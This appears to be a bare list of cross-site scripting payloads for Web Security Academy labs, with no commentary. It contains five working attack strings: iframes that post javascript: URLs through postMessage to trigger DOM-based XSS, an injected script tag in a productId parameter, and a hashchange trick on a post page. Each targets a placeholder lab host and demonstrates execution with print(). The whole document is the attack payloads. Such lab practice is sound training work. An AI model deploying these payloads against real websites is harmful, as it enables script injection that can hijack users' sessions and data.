Payloads
- <iframe src="url" onload="this.contentWindow.postMessage('','*')">
- <iframe src="url" onload="this.contentWindow.postMessage('javascript:print()//http:','*')">
- <iframe src=url onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>
- <iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;">
- first in comments <iframe src=https://YOUR-LAB-ID.web-security-academy.net/post?postId=3 onload="setTimeout(()=>this.src=this.src+'#x',500)">